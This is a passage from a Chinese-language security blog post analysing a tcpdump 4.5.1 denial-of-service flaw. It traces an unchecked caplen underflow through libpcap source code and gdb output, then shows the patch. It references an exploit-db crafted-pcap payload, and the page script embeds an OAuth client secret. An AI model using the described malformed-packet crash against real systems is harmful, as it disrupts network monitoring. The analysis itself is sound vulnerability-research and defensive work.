<p>设置断点之后查看一下该函数的执行结果</p>
|
||
<p>pcap_loop通过callback指向print_packet,来看一下它的源码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1. static void</span><br><span class="line">2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)</span><br><span class="line">3. {</span><br><span class="line">4. struct print_info *print_info;</span><br><span class="line">5. u_int hdrlen;</span><br><span class="line">6. ++packets_captured;</span><br><span class="line">7. ++infodelay;</span><br><span class="line">8. ts_print(&h->ts);</span><br><span class="line">9. print_info = (struct print_info *)user;</span><br><span class="line">10. /*</span><br><span class="line">11. * Some printers want to check that they're not walking off the</span><br><span class="line">12. * end of the packet.</span><br><span class="line">13. * Rather than pass it all the way down, we set this global.</span><br><span class="line">14. */</span><br><span class="line">15. snapend = sp + h->caplen;</span><br><span class="line">16. if(print_info->ndo_type) {</span><br><span class="line">17. hdrlen = (*print_info->p.ndo_printer)(print_info->ndo, h, sp);<====</span><br><span class="line">18. } else {</span><br><span class="line">19. hdrlen = (*print_info->p.printer)(h, sp);</span><br><span class="line">20. }</span><br><span class="line">21. putchar('n');</span><br><span class="line">22. --infodelay;</span><br><span class="line">23. if (infoprint)</span><br><span class="line">24. info(0);}</span><br></pre></td></tr></table></figure></p>
|
||
<p>同样设置断点看该函数是如何调用执行的</p>
|
||
<p>这是我们可以根据call的信息,计算出调用的函数名</p>
|
||
<p>其中(*print_info->p.ndo_printer)(print_info->ndo,h,sp)指向ieee802_15_4_if_print</p>
|
||
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">25. u_int</span><br><span class="line">26. ieee802_15_4_if_print(struct netdissect_options *ndo,</span><br><span class="line">27. const struct pcap_pkthdr *h, const u_char *p)</span><br><span class="line">28. {</span><br><span class="line">29. printf("address : %x\n",p);</span><br><span class="line">30. u_int caplen = h->caplen; //传入的caplen,赋值给无符号整形变量caplen,且该值为8</span><br><span class="line">31. int hdrlen;</span><br><span class="line">32. u_int16_t fc;</span><br><span class="line">33. u_int8_t seq;</span><br><span class="line">34. if (caplen < 3) { //不满足</span><br><span class="line">35. ND_PRINT((ndo, "[|802.15.4] %x", caplen));</span><br><span class="line">36. return caplen;</span><br><span class="line">37. }</span><br><span class="line">38. fc = EXTRACT_LE_16BITS(p);</span><br><span class="line">39. hdrlen = extract_header_length(fc);</span><br><span class="line">40. seq = EXTRACT_LE_8BITS(p + 2);</span><br><span class="line">41. p += 3;</span><br><span class="line">42. caplen -= 3;//此时caplen = 5</span><br><span class="line">43. ND_PRINT((ndo,"IEEE 802.15.4 %s packet ", ftypes[fc & 0x7]));</span><br><span class="line">44. if (vflag)</span><br><span class="line">45. ND_PRINT((ndo,"seq %02x ", seq));</span><br><span class="line">46. if (hdrlen == -1) {</span><br><span class="line">47. ND_PRINT((ndo,"malformed! "));</span><br><span class="line">48. return caplen;</span><br><span class="line">49. }</span><br><span class="line">50. if (!vflag) {</span><br><span class="line">51. p+= hdrlen;</span><br><span class="line">52. caplen -= hdrlen;</span><br><span class="line">53. } else {</span><br><span class="line">54. u_int16_t panid = 0;</span><br><span class="line">55. switch ((fc >> 10) & 0x3) {</span><br><span class="line">56. case 0x00:</span><br><span class="line">57. ND_PRINT((ndo,"none "));</span><br><span class="line">58. break;</span><br><span class="line">59. case 0x01:</span><br><span class="line">60. ND_PRINT((ndo,"reserved destination addressing mode"));</span><br><span class="line">61. return 0;</span><br><span class="line">62. case 0x02:</span><br><span class="line">63. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">64. p += 2;</span><br><span class="line">65. ND_PRINT((ndo,"%04x:%04x ", panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">66. p += 2;</span><br><span class="line">67. break;</span><br><span class="line">68. case 0x03:</span><br><span class="line">69. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">70. p += 2;</span><br><span class="line">71. ND_PRINT((ndo,"%04x:%s ", panid, le64addr_string(p)));</span><br><span class="line">72. p += 8;</span><br><span class="line">73. break;</span><br><span class="line">74. }</span><br><span class="line">75. ND_PRINT((ndo,"< ");</span><br><span class="line">76. switch ((fc >> 14) & 0x3) {</span><br><span class="line">77. case 0x00:</span><br><span class="line">78. ND_PRINT((ndo,"none "));</span><br><span class="line">79. break;</span><br><span class="line">80. case 0x01:</span><br><span class="line">81. ND_PRINT((ndo,"reserved source addressing mode"));</span><br><span class="line">82. return 0;</span><br><span class="line">83. case 0x02:</span><br><span class="line">84. if (!(fc & (1 << 6))) {</span><br><span class="line">85. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">86. p += 2;</span><br><span class="line">87. }</span><br><span class="line">88. ND_PRINT((ndo,"%04x:%04x ", panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">89. p += 2;</span><br><span class="line">90. break;</span><br><span class="line">91. case 0x03:</span><br><span class="line">92. if (!(fc & (1 << 6))) {</span><br><span class="line">93. panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">94. p += 2;</span><br><span class="line">95. }</span><br><span class="line">96. ND_PRINT((ndo,"%04x:%s ", panid, le64addr_string(p))));</span><br><span class="line">97. p += 8;</span><br><span class="line">98. break;</span><br><span class="line">99. }</span><br><span class="line">100. caplen -= hdrlen;</span><br><span class="line">101. }</span><br></pre></td></tr></table></figure>
|
||
<p>传入的第二个值是struct pcap_pkthdr *h结构体,函数使用的参数caplen就是结构体中的caplen,不难看出,caplen进行一些加减操作后,没有判断正负,直接丢给了下一个函数使用。<br>直接跟进函数,看看最后赋值情况</p>
|
||
<p>从源码和调试信息可以看到libpcap在处理不正常包时不严谨,导致包的头长度hdrlen竟然大于捕获包长度caplen,并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数,导致caplen==0xfffffff3过长。<br>继续跟进hex_and_asciii_print(ndo_default_print)</p>
|
||
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">1. void</span><br><span class="line">2. hex_and_ascii_print(register const char *ident, register const u_char *cp,</span><br><span class="line">3. register u_int length)</span><br><span class="line">4. {</span><br><span class="line">5. hex_and_ascii_print_with_offset(ident, cp, length, 0);</span><br><span class="line">6. }</span><br><span class="line"></span><br><span class="line">其中length==0xfffffff3,继续执行</span><br><span class="line">1. void</span><br><span class="line">2. hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,</span><br><span class="line">3. register u_int oset)</span><br><span class="line">4. {</span><br><span class="line">5. register u_int i, s;</span><br><span class="line">6. register int nshorts;</span><br><span class="line">7.</span><br><span class="line">8. nshorts = (u_int) length / sizeof(u_short);</span><br><span class="line">9. i = 0;</span><br><span class="line">10. while (--nshorts >= 0) {</span><br><span class="line">11. if ((i++ % 8) == 0) {</span><br><span class="line">12. (void)printf("%s0x%04x: ", ident, oset);</span><br><span class="line">13. oset += HEXDUMP_BYTES_PER_LINE;</span><br><span class="line">14. }</span><br><span class="line">15. s = *cp++; <======= 抛出错误位置</span><br><span class="line">16. (void)printf(" %02x%02x", s, *cp++);</span><br><span class="line">17. }</span><br><span class="line">18. if (length & 1) {</span><br><span class="line">19. if ((i % 8) == 0)</span><br><span class="line">20. (void)printf("%s0x%04x: ", ident, oset);</span><br><span class="line">21. (void)printf(" %02x", *cp);</span><br><span class="line">22. }</span><br><span class="line">nshorts=(u_int) length / sizeof(u_short) => nshorts=0xfffffff3/2=7FFFFFF9</span><br></pre></td></tr></table></figure>
|
||
<p>但数据包数据没有这么长,导致了crash。</p>
|
||
<h3 id="内存分析"><a href="#内存分析" class="headerlink" title="内存分析"></a>内存分析</h3><p>仔细分析之后发现,通过len判断的这个长度并没有进行控制,如果是自己构造的一个超长len的数据包,则会连续读取到不可估计的值。<br>通过查看epx的值来看一下这个内存到底开辟到什么位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1. gdb-peda$ x/10000000x 0x81e33bd</span><br><span class="line">2. 0x8203fdd: 0x00000000 0x00000000 0x00000000 0x00000000</span><br><span class="line">3. 0x8203fed: 0x00000000 0x00000000 0x00000000 0x00000000</span><br><span class="line">4. 0x8203ffd: Cannot access memory at address 0x8204000</span><br></pre></td></tr></table></figure></p>
|
||
<p>可以看到,到达0x 8204000附近的时候,就是无法读取的无效地址了,那么初始值为0x 81e33bd,用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40,因为ebx+ebp*2+0x1一次读取两个字节,那么循环计数器就要除以2,最后结果为0x 10620。<br>来看一下到达拒绝服务位置读取的长度:EBX: 0x81e33bd –> 0x0;EBP: 0x10621;<br>EBP刚好为10621。正是不可读取内存空间的地址,因此造成拒绝服务。</p>
|
||
<h3 id="漏洞总结"><a href="#漏洞总结" class="headerlink" title="漏洞总结"></a>漏洞总结</h3><p>总结一下整个漏洞触发过程,首先tcpdump会读取恶意构造的pcap包,在构造pcap包的时候,设置一个超长的数据包长度,tcpdump会根据len的长度去读取保存在内存空间数据包的内容,当引用到不可读取内存位置时,会由于引用不可读指针,造成拒绝服务漏洞。</p>
|
||
<h2 id="漏洞修补"><a href="#漏洞修补" class="headerlink" title="漏洞修补"></a>漏洞修补</h2><p>Libpcap依然是apt安装的默认版本,tcpdump使用4.7 .0-bp版本<br>在hex_and_ascii_print_with_offset中增加对caplength的判断<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1. caplength = (ndo->ndo_snapend >= cp) ? ndo->ndo_snapend - cp : 0;</span><br><span class="line">2. if (length > caplength)</span><br><span class="line">3. length = caplength;</span><br><span class="line">4. nshorts = length / sizeof(u_short);</span><br><span class="line">5. i = 0;</span><br><span class="line">6. hsp = hexstuff; asp = asciistuff;</span><br><span class="line">7. while (--nshorts >= 0) {</span><br><span class="line">8. ...</span><br><span class="line">9. }</span><br></pre></td></tr></table></figure></p>
|
||
<p>可以看到执行完caplength = (ndo->ndo_snapend >= cp) ? ndo->ndo_snapend - cp : 0;,caplength为0,继续执行,可以推出length同样为0,到这里已经不会发生错误了。</p>
|
||
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://www.exploit-db.com/exploits/39875/" target="_blank" rel="noopener">exploit-db payload</a><br><a href="https://whereisk0shl.top/post/2016-10-23-1" target="_blank" rel="noopener">WHEREISK0SHL分析博客</a><br><a href="https://github.com/the-tcpdump-group" target="_blank" rel="noopener">libpcap/tcpdump源码</a></p>
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div>
|
||
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
|
||
<div>您的支持将鼓励我继续创作!</div>
|
||
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
|
||
<span>打赏</span>
|
||
</button>
|
||
<div id="QR" style="display: none;">
|
||
|
||
|
||
<div id="wechat" style="display: inline-block">
|
||
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
|
||
<p>微信支付</p>
|
||
</div>
|
||
|
||
|
||
|
||
<div id="alipay" style="display: inline-block">
|
||
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
|
||
<p>支付宝</p>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</div>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
<footer class="post-footer">
|
||
|
||
<div class="post-tags">
|
||
|
||
<a href="/tags/TCPDUMP/" rel="tag"># TCPDUMP</a>
|
||
|
||
<a href="/tags/拒绝服务攻击/" rel="tag"># 拒绝服务攻击</a>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="post-nav">
|
||
<div class="post-nav-next post-nav-item">
|
||
|
||
<a href="/2018/11/16/BIBA访问控制模型实现(python)/" rel="next" title="利用python实现BIBA模型">
|
||
<i class="fa fa-chevron-left"></i> 利用python实现BIBA模型
|
||
</a>
|
||
|
||
</div>
|
||
|
||
<span class="post-nav-divider"></span>
|
||
|
||
<div class="post-nav-prev post-nav-item">
|
||
|
||
<a href="/2019/01/16/wifi半双工侧信道攻击学习笔记/" rel="prev" title="wifi半双工侧信道攻击学习笔记">
|
||
wifi半双工侧信道攻击学习笔记 <i class="fa fa-chevron-right"></i>
|
||
</a>
|
||
|
||
</div>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
</footer>
|
||
</div>
|
||
|
||
|
||
|
||
</article>
|
||
|
||
|
||
|
||
<div class="post-spread">
|
||
|
||
</div>
|
||
</div>
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="comments" id="comments">
|
||
|
||
<div id="gitment-container"></div>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
<div class="sidebar-toggle">
|
||
<div class="sidebar-toggle-line-wrap">
|
||
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
|
||
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
|
||
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
|
||
</div>
|
||
</div>
|
||
|
||
<aside id="sidebar" class="sidebar">
|
||
|
||
<div class="sidebar-inner">
|
||
|
||
|
||
|
||
|
||
<ul class="sidebar-nav motion-element">
|
||
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
|
||
文章目录
|
||
</li>
|
||
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
|
||
站点概览
|
||
</li>
|
||
</ul>
|
||
|
||
|
||
<section class="site-overview-wrap sidebar-panel">
|
||
<div class="site-overview">
|
||
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
|
||
|
||
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
|
||
|
||
<p class="site-author-name" itemprop="name">Cool-Y</p>
|
||
<p class="site-description motion-element" itemprop="description"></p>
|
||
</div>
|
||
|
||
<nav class="site-state motion-element">
|
||
|
||
|
||
<div class="site-state-item site-state-posts">
|
||
|
||
<a href="/archives/">
|
||
|
||
<span class="site-state-item-count">6</span>
|
||
<span class="site-state-item-name">日志</span>
|
||
</a>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="site-state-item site-state-categories">
|
||
<a href="/categories/index.html">
|
||
<span class="site-state-item-count">5</span>
|
||
<span class="site-state-item-name">分类</span>
|
||
</a>
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="site-state-item site-state-tags">
|
||
<a href="/tags/index.html">
|
||
<span class="site-state-item-count">13</span>
|
||
<span class="site-state-item-name">标签</span>
|
||
</a>
|
||
</div>
|
||
|
||
|
||
</nav>
|
||
|
||
|
||
|
||
|
||
<div class="links-of-author motion-element">
|
||
|
||
<span class="links-of-author-item">
|
||
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
|
||
|
||
<i class="fa fa-fw fa-github"></i>GitHub</a>
|
||
</span>
|
||
|
||
<span class="links-of-author-item">
|
||
<a href="http://weibo.com/HanYanOpenFire" target="_blank" title="Weibo">
|
||
|
||
<i class="fa fa-fw fa-weibo"></i>Weibo</a>
|
||
</span>
|
||
|
||
<span class="links-of-author-item">
|
||
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
|
||
|
||
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
|
||
</span>
|
||
|
||
<span class="links-of-author-item">
|
||
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
|
||
|
||
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
|
||
</span>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</section>
|
||
|
||
|
||
<!--noindex-->
|
||
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
|
||
<div class="post-toc">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><span class="nav-number">1.</span> <span class="nav-text">TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Tcpdump介绍"><span class="nav-number">1.1.</span> <span class="nav-text">Tcpdump介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析环境"><span class="nav-number">1.2.</span> <span class="nav-text">分析环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-number">1.3.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#编译安装tcpdump"><span class="nav-number">1.3.1.</span> <span class="nav-text">编译安装tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成payload(来自exploit-db-payload)"><span class="nav-number">1.3.2.</span> <span class="nav-text">生成payload(来自exploit-db payload)</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#崩溃分析"><span class="nav-number">1.4.</span> <span class="nav-text">崩溃分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#pcap包格式"><span class="nav-number">1.4.1.</span> <span class="nav-text">pcap包格式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#gdb调试"><span class="nav-number">1.4.2.</span> <span class="nav-text">gdb调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#内存分析"><span class="nav-number">1.4.3.</span> <span class="nav-text">内存分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞总结"><span class="nav-number">1.4.4.</span> <span class="nav-text">漏洞总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修补"><span class="nav-number">1.5.</span> <span class="nav-text">漏洞修补</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">1.6.</span> <span class="nav-text">参考</span></a></li></ol></li></ol></div>
|
||
|
||
|
||
</div>
|
||
</section>
|
||
<!--/noindex-->
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</aside>
|
||
|
||
|
||
|
||
</div>
|
||
</main>
|
||
|
||
<footer id="footer" class="footer">
|
||
<div class="footer-inner">
|
||
<div class="copyright">© <span itemprop="copyrightYear">2019</span>
|
||
<span class="with-love">
|
||
<i class="fa fa-user"></i>
|
||
</span>
|
||
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
|
||
|
||
|
||
<span class="post-meta-divider">|</span>
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-area-chart"></i>
|
||
</span>
|
||
|
||
<span title="Site words total count">9.8k</span>
|
||
|
||
</div>
|
||
|
||
|
||
<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="busuanzi-count">
|
||
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
|
||
|
||
|
||
<span class="site-uv">
|
||
<i class="fa fa-user"></i>
|
||
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
|
||
|
||
</span>
|
||
|
||
|
||
|
||
<span class="site-pv">
|
||
<i class="fa fa-eye"></i>
|
||
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
|
||
|
||
</span>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</div>
|
||
</footer>
|
||
|
||
|
||
<div class="back-to-top">
|
||
<i class="fa fa-arrow-up"></i>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
|
||
</div>
|
||
|
||
|
||
|
||
<script type="text/javascript">
|
||
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
|
||
window.Promise = null;
|
||
}
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
|
||
|
||
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
|
||
|
||
<script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
|
||
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<!-- LOCAL: You can save these files to your site and update links -->
|
||
|
||
|
||
<link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
|
||
<script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
|
||
|
||
<!-- END LOCAL -->
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript">
|
||
function renderGitment(){
|
||
var gitment = new Gitmint({
|
||
id: window.location.pathname,
|
||
owner: 'Cool-Y',
|
||
repo: 'gitment-comments',
|
||
|
||
lang: "" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
|
||
|
||
oauth: {
|
||
|
||
|
||
client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
|
||
|
||
client_id: '180955a2c3ae3d966d9a'
|
||
}});
|
||
gitment.render('gitment-container');
|
||
}
|
||
|
||
|
||
renderGitment();
|
||
|
||
</script>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script type="text/javascript">
|
||
// Popup Window;
|
||
var isfetched = false;
|
||
var isXml = true;
|
||
// Search DB path;
|
||
var search_path = "search.xml";
|
||
if (search_path.length === 0) {
|
||
search_path = "search.xml";
|
||
} else if (/json$/i.test(search_path)) {
|
||
isXml = false;
|
||
}
|
||
var path = "/" + search_path;
|
||
// monitor main search box;
|
||
|
||
var onPopupClose = function (e) {
|
||
$('.popup').hide();
|
||
$('#local-search-input').val('');
|
||
$('.search-result-list').remove();
|
||
$('#no-result').remove();
|
||
$(".local-search-pop-overlay").remove();
|
||
$('body').css('overflow', '');
|
||
}
|
||
|
||
function proceedsearch() {
|
||
$("body")
|
||
.append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
|
||
.css('overflow', 'hidden');
|
||
$('.search-popup-overlay').click(onPopupClose);
|
||
$('.popup').toggle();
|
||
var $localSearchInput = $('#local-search-input');
|
||
$localSearchInput.attr("autocapitalize", "none");
|
||
$localSearchInput.attr("autocorrect", "off");
|
||
$localSearchInput.focus();
|
||
}
|
||
|
||
// search function;
|
||
var searchFunc = function(path, search_id, content_id) {
|
||
'use strict';
|
||
|
||
// start loading animation
|
||
$("body")
|
||
.append('<div class="search-popup-overlay local-search-pop-overlay">' +
|
||
'<div id="search-loading-icon">' +
|
||
'<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
|
||
'</div>' +
|
||
'</div>')
|
||
.css('overflow', 'hidden');
|
||
$("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
|
||
|
||
$.ajax({
|
||
url: path,
|
||
dataType: isXml ? "xml" : "json",
|
||
async: true,
|
||
success: function(res) {
|
||
// get the contents from search data
|
||
isfetched = true;
|
||
$('.popup').detach().appendTo('.header-inner');
|
||
var datas = isXml ? $("entry", res).map(function() {
|
||
return {
|
||
title: $("title", this).text(),
|
||
content: $("content",this).text(),
|
||
url: $("url" , this).text()
|
||
};
|
||
}).get() : res;
|
||
var input = document.getElementById(search_id);
|
||
var resultContent = document.getElementById(content_id);
|
||
var inputEventFunction = function() {
|
||
var searchText = input.value.trim().toLowerCase();
|
||
var keywords = searchText.split(/[\s\-]+/);
|
||
if (keywords.length > 1) {
|
||
keywords.push(searchText);
|
||
}
|
||
var resultItems = [];
|
||
if (searchText.length > 0) {
|
||
// perform local searching
|
||
datas.forEach(function(data) {
|
||
var isMatch = false;
|
||
var hitCount = 0;
|
||
var searchTextCount = 0;
|
||
var title = data.title.trim();
|
||
var titleInLowerCase = title.toLowerCase();
|
||
var content = data.content.trim().replace(/<[^>]+>/g,"");
|
||
var contentInLowerCase = content.toLowerCase();
|
||
var articleUrl = decodeURIComponent(data.url);
|
||
var indexOfTitle = [];
|
||
var indexOfContent = [];
|
||
// only match articles with not empty titles
|
||
if(title != '') {
|
||
keywords.forEach(function(keyword) {
|
||
function getIndexByWord(word, text, caseSensitive) {
|
||
var wordLen = word.length;
|
||
if (wordLen === 0) {
|
||
return [];
|
||
}
|
||
var startPosition = 0, position = [], index = [];
|
||
if (!caseSensitive) {
|
||
text = text.toLowerCase();
|
||
word = word.toLowerCase();
|
||
}
|
||
while ((position = text.indexOf(word, startPosition)) > -1) {
|
||
index.push({position: position, word: word});
|
||
startPosition = position + wordLen;
|
||
}
|
||
return index;
|
||
}
|
||
|
||
indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
|
||
indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
|
||
});
|
||
if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
|
||
isMatch = true;
|
||
hitCount = indexOfTitle.length + indexOfContent.length;
|
||
}
|
||
}
|
||
|
||
// show search results
|
||
|
||
if (isMatch) {
|
||
